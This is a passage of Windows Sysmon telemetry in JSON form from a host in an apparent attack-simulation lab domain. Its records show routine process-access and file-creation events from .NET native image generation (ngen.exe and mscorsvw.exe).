{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.162\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053820F00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.162","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053820F00}","TargetProcessId":"5028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:48.522\r\nProcessGuid: {41C8662E-2298-5F25-0000-00102BEF0F00}\r\nProcessId: 5028\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13a4-0\\System.ServiceModel.Routing.dll\r\nCreationUtcTime: 2020-08-01 08:06:48.522","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:48.522","ProcessGuid":"{41C8662E-2298-5F25-0000-00102BEF0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13a4-0\\System.ServiceModel.Routing.dll","CreationUtcTime":"2020-08-01 08:06:48.522","EventReceivedTime":"2020-08-01 08:06:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.568\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-0010DEF50F00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.568","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-0010DEF50F00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.568\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-0010DEF50F00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.568","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-0010DEF50F00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.568\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-0010DEF50F00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.568","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-0010DEF50F00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.662\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-00106EF90F00}\r\nTargetProcessId: 3596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.662","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-00106EF90F00}","TargetProcessId":"3596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.662\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-00106EF90F00}\r\nTargetProcessId: 3596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.662","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-00106EF90F00}","TargetProcessId":"3596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-00106EF90F00}\r\nTargetProcessId: 3596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:48.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-00106EF90F00}","TargetProcessId":"3596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:48.709\r\nProcessGuid: {41C8662E-2298-5F25-0000-00106EF90F00}\r\nProcessId: 3596\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\e0c-0\\System.ServiceModel.ServiceMoniker40.dll\r\nCreationUtcTime: 2020-08-01 08:06:48.709","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:48.709","ProcessGuid":"{41C8662E-2298-5F25-0000-00106EF90F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\e0c-0\\System.ServiceModel.ServiceMoniker40.dll","CreationUtcTime":"2020-08-01 08:06:48.709","EventReceivedTime":"2020-08-01 08:06:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:48.740\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-0010CEFE0F00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 